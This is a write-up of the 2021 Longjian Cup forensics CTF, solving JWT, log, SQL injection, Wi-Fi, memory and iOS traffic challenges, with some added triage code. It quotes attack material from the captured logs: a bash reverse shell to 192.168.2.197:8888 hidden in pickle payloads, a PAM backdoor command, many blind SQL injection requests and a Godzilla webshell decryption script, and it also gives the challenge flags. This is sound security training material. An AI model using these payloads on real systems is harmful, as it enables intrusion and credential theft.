Preface
Notes on the DIDCTF 2021 陇剑杯 (Longjian Cup) challenges; the problem quality was decent.
0. Sign-in
Question: The network attack currently in progress is probably against the _ protocol. (Use lowercase letters; rename the attachment's extension to .zip yourself.)
Filter on the HTTP protocol: every request is GET / and the server answers each one with 403 Forbidden:
Answer: http (an HTTP-protocol network attack).
I. jwt
1. jwt-1
Question: Yesterday the unit's traffic system captured attack traffic. Analyse the capture and answer: which ( ) authentication method does the site use? (letters lowercase by default)
Open the first packet of the capture and follow the stream; the Cookie is obviously a JWT:
Authentication method: jwt
2. jwt-2
Question: In the JWT the hacker used to bypass verification, the id and username are ___. (separate them with #, e.g. 1#admin)
Following TCP stream 10, the attacker ran whoami and it succeeded: the server returned root, so this token must be the JWT that bypassed verification:
Take that JWT and decode it on a website: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MTAwODcsIk1hcENsYWltcyI6eyJ1c2VybmFtZSI6ImFkbWluIn19.rurQD5RYgMrFZow8r-k7KCP13P32sF-RpTXhKsxzvD0
Answer: 10087#admin
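An added example (not part of the writeup) that decodes the token above without trusting it, and shows how a server-side HS256 check should look; the key `b"not-the-real-key"` is a constructed placeholder, not the challenge's key:

```python
import base64
import hashlib
import hmac
import json

# The token quoted in the writeup above.
TOKEN = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
         "eyJpZCI6MTAwODcsIk1hcENsYWltcyI6eyJ1c2VybmFtZSI6ImFkbWluIn19."
         "rurQD5RYgMrFZow8r-k7KCP13P32sF-RpTXhKsxzvD0")


def b64url_decode(s: str) -> bytes:
    # JWT segments drop the '=' padding; restore it before decoding.
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def decode_jwt_unverified(token: str):
    """Split a token into (header, payload, signature) WITHOUT checking the signature.
    This is what an online decoder does; it is fine for triage, never for authorization."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWS")
    header, payload, sig = parts
    return json.loads(b64url_decode(header)), json.loads(b64url_decode(payload)), b64url_decode(sig)


def sign_hs256(header: dict, payload: dict, key: bytes) -> str:
    # Constructed helper so a known-good token can be produced offline.
    seg = lambda d: b64url_encode(json.dumps(d, separators=(",", ":")).encode())
    signing_input = f"{seg(header)}.{seg(payload)}"
    mac = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(mac)}"


def verify_hs256(token: str, key: bytes) -> bool:
    """Server-side check: pin the algorithm to HS256 (so 'none' or an RS256 key-confusion
    header is rejected) and compare the HMAC in constant time."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        return False
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(sig_b64))


def claims_of_interest(token: str) -> tuple:
    """Return (id, username) the way the question asks for them."""
    _, payload, _ = decode_jwt_unverified(token)
    return payload["id"], payload["MapClaims"]["username"]
```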
3. jwt-3
Question: After getting the webshell, what privilege does the hacker have? (letters lowercase by default)
Already answered by the previous question: in TCP stream 10 the attacker ran whoami and the server returned root:
Privilege: root
4. jwt-4
Question: The malicious file the hacker uploaded is named ___. (submit the file name with its extension, e.g. x.txt)
TCP stream 13:
command=echo xxx > /tmp/1.c
File name: 1.c
5. jwt-5
Question: The malicious .so file the hacker compiled on the server is named ___. (submit the file name with its extension, e.g. x.so)
TCP stream 21:
The attacker ran ls /tmp and the server returned Makefile and looter.so,
so the compiled .so file is: looter.so
6. jwt-6
Question: The hacker modified a configuration file on the server; its absolute path is ___. (double-check the absolute path before submitting)
TCP stream 26, where the attacker ran:
command=echo%20"auth%20optional%20looter.so">>/etc/pam.d/common-auth
URL-decoded: echo "auth optional looter.so" >> /etc/pam.d/common-auth
Absolute path: /etc/pam.d/common-auth
II. Log analysis
1. Log analysis-1
Question: One of the unit's applications was attacked. Analyse the log and answer: the site leaks its source code; the source file name is __
We are given an access.log, a web application log...
Search directly for 200:
Source file: www.zip
2. Log analysis-2
Question: Analysing the attack traffic, the hacker wrote a file into the /tmp directory; the file name is ___.
Search directly for tmp:
URL-decode it:
The file name is visible: sess_car
3. Log analysis-3
Question: Analysing the attack traffic, the hacker used the __ class to read the secret file.
Still the same log line as above:
172.17.0.1 - - [07/Aug/2021:01:38:21 0000] "GET /?filename=../../../../../../../../../../../../../../../../../tmp/sess_car&content=func|N;files|a:2:{s:8:"filename";s:16:"./files/filename";s:20:"call_user_func_array";s:28:"./files/call_user_func_array";}paths|a:1:{s:5:"/flag";s:13:"SplFileObject";} HTTP/1.1" 302 879 "-" "python-requests/2.26.0"
Class: SplFileObject
III. Simple log analysis
1. Simple log analysis-1
Question: An application was attacked. Analyse the log and answer: the parameter the hacker attacked is ___. (use lowercase letters)
The beginning is all directory scanning; further down are the log lines that pass a parameter:
The parameter is: user
2. Simple log analysis-2
Question: The absolute path of the secret file the hacker viewed is ___. (without the leading /)
Once the 404 lines are removed, only three 500 lines remain; decode them one by one and the second is the secret file:
127.0.0.1 - - [07/Aug/2021 10:43:12] "GET /?user=STAKcDAKMFMnY2F0IC9UaDRzX0lTX1ZFUllfSW1wb3J0X0ZpMWUnCnAxCjAoZzAKbHAyCjAoSTAKdHAzCjAoZzMKSTAKZHA0CjBjb3MKc3lzdGVtCnA1CjBnNQooZzEKdFIu HTTP/1.1" 500 -
Decoded (the base64 is a Python pickle whose os.system argument is): cat /Th4s_IS_VERY_Import_Fi1e
Absolute path (without the /): Th4s_IS_VERY_Import_Fi1e
3. Simple log analysis-3
Question: The IP and port of the hacker's reverse shell are ___. (format "ip:port", e.g. 127.0.0.1:2333)
There are three status-500 lines in total; look at the third:
127.0.0.1 - - [07/Aug/2021 10:43:12] "GET /?user=STAKcDAKMFMnYmFzaCAtaSA%2bJiAvZGV2L3RjcC8xOTIuMTY4LjIuMTk3Lzg4ODggMD4mMScKcDEKMChnMApscDIKMChJMAp0cDMKMChnMwpJMApkcDQKMGNvcwpzeXN0ZW0KcDUKMGc1CihnMQp0Ui4= HTTP/1.1" 500 -
Decoded:
Command: bash -i >& /dev/tcp/192.168.2.197/8888 0>&1
IP and port: 192.168.2.197:8888
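The two base64 values above are protocol-0 Python pickles that call os.system on load. As an added triage example (not part of the writeup), this disassembles each `user=` payload statically with `pickletools.genops`, so the command string is recovered without ever unpickling; the two log lines are constructed copies of the ones quoted above:

```python
import base64
import pickletools
import re
from urllib.parse import unquote

# Constructed sample: two access-log lines modelled on the 500 responses quoted above.
SAMPLE_LOG = """\
127.0.0.1 - - [07/Aug/2021 10:43:12] "GET /?user=STAKcDAKMFMnY2F0IC9UaDRzX0lTX1ZFUllfSW1wb3J0X0ZpMWUnCnAxCjAoZzAKbHAyCjAoSTAKdHAzCjAoZzMKSTAKZHA0CjBjb3MKc3lzdGVtCnA1CjBnNQooZzEKdFIu HTTP/1.1" 500 -
127.0.0.1 - - [07/Aug/2021 10:43:12] "GET /?user=STAKcDAKMFMnYmFzaCAtaSA%2bJiAvZGV2L3RjcC8xOTIuMTY4LjIuMTk3Lzg4ODggMD4mMScKcDEKMChnMApscDIKMChJMAp0cDMKMChnMwpJMApkcDQKMGNvcwpzeXN0ZW0KcDUKMGc1CihnMQp0Ui4= HTTP/1.1" 500 -
"""

USER_PARAM = re.compile(r'GET /\?user=([^ "]+) HTTP/')
STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
              "UNICODE", "BINUNICODE", "SHORT_BINUNICODE"}
# GLOBAL targets whose presence means the pickle runs code when loaded.
DANGEROUS = {"os.system", "os.popen", "subprocess.Popen", "subprocess.check_output",
             "builtins.eval", "builtins.exec", "__builtin__.eval", "__builtin__.exec"}


def inspect_pickle(blob: bytes) -> dict:
    """Walk the opcode stream; genops only parses, it never imports or calls anything."""
    globals_, strings = [], []
    for opcode, arg, _pos in pickletools.genops(blob):
        if opcode.name == "GLOBAL":           # protocol-0 'c' opcode carries "module name"
            globals_.append(arg.replace(" ", ".", 1))
        elif opcode.name in STRING_OPS:       # the os.system argument is pushed as a STRING
            strings.append(arg)
    return {"globals": globals_, "strings": strings,
            "dangerous": bool(set(globals_) & DANGEROUS)}


def triage_log(text: str) -> list:
    """For each request carrying a user= value, decode it and report what the pickle would do."""
    findings = []
    for line in text.splitlines():
        m = USER_PARAM.search(line)
        if not m:
            continue
        b64 = unquote(m.group(1))                       # %2b -> '+'
        try:
            blob = base64.b64decode(b64 + "=" * (-len(b64) % 4))
            info = inspect_pickle(blob)
        except ValueError:                              # not base64 / not a pickle: skip
            continue
        info["line"] = line
        findings.append(info)
    return findings
```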
IV. SQL injection
1. SQL injection-1
Question: An application was attacked. Analyse the log and answer: the injection technique the hacker used is called ___. (four Chinese characters, e.g. "拼搏努力")
Take the very first record in the log:
172.17.0.1 - - [01/Sep/2021:01:37:25 +0000] "GET /index.php?id=1%20and%20if(substr(database(),1,1)%20=%20'%C2%80',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 422 "-" "python-requests/2.26.0"
URL-decoded:
172.17.0.1 - - [01/Sep/2021:01:37:25 0000] "GET /index.php?id=1 and if(substr(database(),1,1) = '',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 422 "-" "python-requests/2.26.0"
Clearly Boolean-based blind injection (布尔盲注).
2. SQL injection-2
Question: The database name, table name and column name from which the hacker finally obtained the flag are ___. (format "database#table#column", e.g. database#table#column)
Pull out every blind-injection line whose guess was correct:
First the database name: sqli
172.17.0.1 - - [01/Sep/2021:01:37:25 0000] "GET /index.php?id=1 and if(substr(database(),1,1) = 's',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 472 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:37:25 0000] "GET /index.php?id=1 and if(substr(database(),2,1) = 'q',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 473 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:37:25 0000] "GET /index.php?id=1 and if(substr(database(),3,1) = 'l',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 472 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:37:25 0000] "GET /index.php?id=1 and if(substr(database(),4,1) = 'i',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 472 "-" "python-requests/2.26.0"
Then the table name: flag
172.17.0.1 - - [01/Sep/2021:01:42:24 0000] "GET /index.php?id=1 and if(substr((select table_name from information_schema.tables where table_schema='sqli' limit 0,1),1,1) = 'f',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 492 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:42:24 0000] "GET /index.php?id=1 and if(substr((select table_name from information_schema.tables where table_schema='sqli' limit 0,1),2,1) = 'l',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 495 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:42:25 0000] "GET /index.php?id=1 and if(substr((select table_name from information_schema.tables where table_schema='sqli' limit 0,1),3,1) = 'a',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 495 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:42:25 0000] "GET /index.php?id=1 and if(substr((select table_name from information_schema.tables where table_schema='sqli' limit 0,1),4,1) = 'g',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 494 "-" "python-requests/2.26.0"
Then the column name: flag
172.17.0.1 - - [01/Sep/2021:01:44:01 0000] "GET /index.php?id=1 and if(substr((select column_name from information_schema.columns where table_name='flag' and table_schema='sqli'),1,1) = 'f',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 501 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:44:01 0000] "GET /index.php?id=1 and if(substr((select column_name from information_schema.columns where table_name='flag' and table_schema='sqli'),2,1) = 'l',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 506 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:44:01 0000] "GET /index.php?id=1 and if(substr((select column_name from information_schema.columns where table_name='flag' and table_schema='sqli'),3,1) = 'a',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 506 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:44:02 0000] "GET /index.php?id=1 and if(substr((select column_name from information_schema.columns where table_name='flag' and table_schema='sqli'),4,1) = 'g',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 506 "-" "python-requests/2.26.0"
Put together in the required database#table#column format:
sqli#flag#flag
3. SQL injection-3
Question: The flag string the hacker finally obtained is __.
Continue from the previous question; the last batch of blind-injection lines extracts the data: flag{deddcd67-bcfd-487e-b940-1217e668c7db}
172.17.0.1 - - [01/Sep/2021:01:45:55 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),1,1) = 'f',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:56 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),2,1) = 'l',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 481 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:56 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),3,1) = 'a',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 481 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:56 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),4,1) = 'g',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 481 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:56 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),5,1) = '{',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 481 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:56 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),6,1) = 'd',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 482 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:56 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),7,1) = 'e',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 482 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:56 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),8,1) = 'd',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 481 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:56 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),9,1) = 'd',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 482 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:57 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),10,1) = 'c',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:57 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),11,1) = 'd',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:57 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),12,1) = '6',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:58 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),13,1) = '7',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:58 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),14,1) = '-',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:58 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),15,1) = 'b',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:58 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),16,1) = 'c',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:58 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),17,1) = 'f',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 481 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:59 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),18,1) = 'd',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:59 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),19,1) = '-',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:59 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),20,1) = '4',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:00 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),21,1) = '8',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:00 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),22,1) = '7',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:00 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),23,1) = 'e',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:01 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),24,1) = '-',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:01 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),25,1) = 'b',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:01 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),26,1) = '9',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 481 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:02 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),27,1) = '4',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:02 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),28,1) = '0',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:02 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),29,1) = '-',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:03 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),30,1) = '1',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:03 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),31,1) = '2',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:04 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),32,1) = '1',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:04 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),33,1) = '7',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:04 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),34,1) = 'e',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:04 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),35,1) = '6',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:05 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),36,1) = '6',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:05 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),37,1) = '8',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 481 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:05 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),38,1) = 'c',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:06 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),39,1) = '7',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 481 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:06 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),40,1) = 'd',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:06 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),41,1) = 'b',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:06 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),42,1) = '}',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:06 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),43,1) = ' ',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 478 "-" "python-requests/2.26.0"
V. WIFI
Question: Xiao Wang, a network admin, recently took a liking to CTF security competitions. He used the Godzilla (哥斯拉) webshell to play with upload-labs and saved a memory image, the Wi-Fi traffic and the server traffic. Analyse them and answer: after uploading the webshell to upload-labs, Xiao Wang ran cat /flag; the flag content is __. (The archive contains a hint for the extraction password; add the curly braces yourself.)
First open the server-side capture and filter on HTTP requests: five POST requests, all to 1.php:
Open any one of them:
Encrypted traffic, so it will have to be decrypted:
Then read through all the server logs: nothing useful there.
Next, the client-side capture:
802.11 is the Wi-Fi traffic, but nothing in it can be identified; it must be encrypted...
A good chance to learn how Wireshark decrypts wireless traffic:
The encryption here is WPA; decrypting it needs the SSID and the passphrase:
The SSID is already given: My_Wifi
The passphrase should be in the memory image, so look there:
filescan -> 0x000000003fdc38c8 2 0 -W-rwd \Device\HarddiskVolume1\Program Files\My_Wifi.zip
\Temp\vmware-admin\VMwareDnD\2a1221c7\My_Wifi.zip
Export this file:
Extracting the archive needs yet another password, and the archive contains a hint:
Some searching says the GUID relates to the network adapter, so search for Interfaces
and it turns up:
0x000000001c7ec5c8 2 1 R--rwd \Device\HarddiskVolume1\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\{529B7D2A-05D1-4F21-A001-8F4FF817FC3A}
Extracting the archive then yields:
<?xml version="1.0"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
  <name>My_Wifi</name>
  <SSIDConfig><SSID><hex>4D795F57696669</hex><name>My_Wifi</name></SSID></SSIDConfig>
  <connectionType>ESS</connectionType>
  <connectionMode>auto</connectionMode>
  <MSM><security>
    <authEncryption><authentication>WPA2PSK</authentication><encryption>AES</encryption><useOneX>false</useOneX></authEncryption>
    <sharedKey><keyType>passPhrase</keyType><protected>false</protected><keyMaterial>233@114514_qwe</keyMaterial></sharedKey>
  </security></MSM>
</WLANProfile>
Which gives the passphrase: 233@114514_qwe
Next configure Wireshark:
Then filter on HTTP requests:
Decrypt and analyse them one by one. This is a very old Godzilla version, so use a script:
```php
<?php
// Use the encode() routine directly: the XOR is symmetric, so it also decrypts
function encode($D, $K) {
    for ($i = 0; $i < strlen($D); $i++) {
        $c = $K[$i + 1 & 15];   // ($i + 1) & 15: cycles through the 16-byte key
        $D[$i] = $D[$i] ^ $c;
    }
    return $D;
}
$key  = '3c6e0b8a9c15224a';
$key1 = "ciphertext";            // paste the captured body here
$str  = substr($key1, 16, -16);  // strip the first 16 and last 16 characters of the original data
$str  = gzdecode(encode(base64_decode($str), $key));
echo $str;
?>
```
Finally, decrypting TCP stream 39 reveals the flag: flag{5db5b7b0bb74babb66e1522f3a6b1b12}
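An added Python port of the decryption routine above (not part of the original post): the same XOR with key[(i+1)&15], base64 and gzip steps, plus a constructed encrypt() so the round trip can be checked offline. The key is the one from the script above; the sample plaintext is made up.

```python
import base64
import gzip
import hashlib
import os

# Key used by the writeup's PHP script (Godzilla's PHP_XOR_BASE64 key for this capture).
KEY = b"3c6e0b8a9c15224a"


def xor_with_key(data: bytes, key: bytes = KEY) -> bytes:
    """Mirror of the PHP encode(): byte i is XORed with key[(i + 1) & 15].
    XOR is its own inverse, so the same call encrypts and decrypts."""
    return bytes(b ^ key[(i + 1) & 15] for i, b in enumerate(data))


def godzilla_decrypt(body: str, key: bytes = KEY, framed: bool = True) -> bytes:
    """Recover the plaintext of a captured body.
    framed=True matches the script's substr($key1, 16, -16): the response carries a
    16-character tag on each side of the base64; set framed=False for a bare base64 body."""
    inner = body[16:-16] if framed else body
    return gzip.decompress(xor_with_key(base64.b64decode(inner), key))


def godzilla_encrypt(plain: bytes, key: bytes = KEY, framed: bool = True) -> str:
    """Constructed inverse, only used here to build sample traffic for testing."""
    inner = base64.b64encode(xor_with_key(gzip.compress(plain), key)).decode()
    if not framed:
        return inner
    tag = hashlib.md5(os.urandom(8)).hexdigest()   # stand-in for the 32-char frame
    return tag[:16] + inner + tag[16:]


def demo() -> bytes:
    # Constructed plaintext standing in for the output of a command run through the shell.
    sample = godzilla_encrypt(b"flag{constructed-sample-not-the-real-one}\n")
    return godzilla_decrypt(sample)
```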
VI. Memory analysis
1. Memory analysis-1
Question: The virtual machine's password is ___. (The password is of the form flag{xxxx} and contains spaces; do not remove them when submitting)
Process the image with volatility, then use the mimikatz plugin:
mimikatz -> flag{W31C0M3 T0 THiS 34SY F0R3NSiCX}
2. Memory analysis-2
Question: The virtual machine contains a backup file from a certain brand of phone; the string in the picture inside that file is __. (Solving this requires the content of the previous answer's flag. The format is again flag{xx}; if the answer contains spaces, keep them)
Scan all files and find one: \Device\HarddiskVolume1\Users\CTF\Desktop\HUAWEI P40_2021-aa-bb xx.yy.zz.exe
Export the file, change the extension to exe, and double-clicking it offers to extract:
Extraction produces a folder, and inside it is an images0.tar.enc.
This must be where the hint from the question comes in: the previous flag is the password, with spaces changed to underscores: W31C0M3_T0_THiS_34SY_F0R3NSiCX
Then decrypt the Huawei backup with the kobackupdec.py script:
https://github.com/RealityNet/kobackupdec
python3 kobackupdec.py -vvv "W31C0M3_T0_THiS_34SY_F0R3NSiCX" "HUAWEI P40_2021-aa-bb xx.yy.zz/" "./"
flag{TH4NK Y0U FOR DECRYPTING MY DATA}
VII. IOS
1. IOS-1
Question: An iOS security researcher using a phone on the home network was hacked: data was stolen and some bitcoin went missing. Analyse the traffic and logs and answer: the IP of the C&C server the hacker controls is ___.
TCP stream 15: the controlling server is 3.128.156.159
2. IOS-2
Question: The name of the open-source GitHub project the hacker used is ___. (use lowercase letters)
Still TCP stream 15:
A file was downloaded from GitHub with wget: Stowaway
3. IOS-3
Question: The plaintext of the communication encryption key is ___.
Still TCP stream 15; the key: hack4sec
4. IOS-4
Question: The hacker obtained a piece of sensitive data through blind SQL injection; its content is ___.
All the communication here is TLS-encrypted, so it has to be decrypted first; that is why the challenge ships a keylog.txt:
With that loaded, the traffic decrypts.
Then find a flow that looks like injection:
It uses HTTP/2, so filter on http2 next, which turns up the SQL injection traffic:
Pull out every request whose condition was true:
/info?l=1&o=(case_when_(select_hex(substr(password,1,1))_from_user)="37"_then_id_else_col1_end)
/info?l=1&o=(case_when_(select_hex(substr(password,2,1))_from_user)="34"_then_id_else_col1_end)
/info?l=1&o=(case_when_(select_hex(substr(password,3,1))_from_user)="36"_then_id_else_col1_end)
/info?l=1&o=(case_when_(select_hex(substr(password,4,1))_from_user)="35"_then_id_else_col1_end)
/info?l=1&o=(case_when_(select_hex(substr(password,5,1))_from_user)="35"_then_id_else_col1_end)
/info?l=1&o=(case_when_(select_hex(substr(password,6,1))_from_user)="38"_then_id_else_col1_end)
/info?l=1&o=(case_when_(select_hex(substr(password,7,1))_from_user)="66"_then_id_else_col1_end)
/info?l=1&o=(case_when_(select_hex(substr(password,8,1))_from_user)="33"_then_id_else_col1_end)
/info?l=1&o=(case_when_(select_hex(substr(password,9,1))_from_user)="2D"_then_id_else_col1_end)
/info?l=1&o=(case_when_(select_hex(substr(password,10,1))_from_user)="63"_then_id_else_col1_end)
/info?l=1&o=(case_when_(select_hex(substr(password,11,1))_from_user)="38"_then_id_else_col1_end)
/info?l=1&o=(case_when_(select_hex(substr(password,12,1))_from_user)="34"_then_id_else_col1_end)
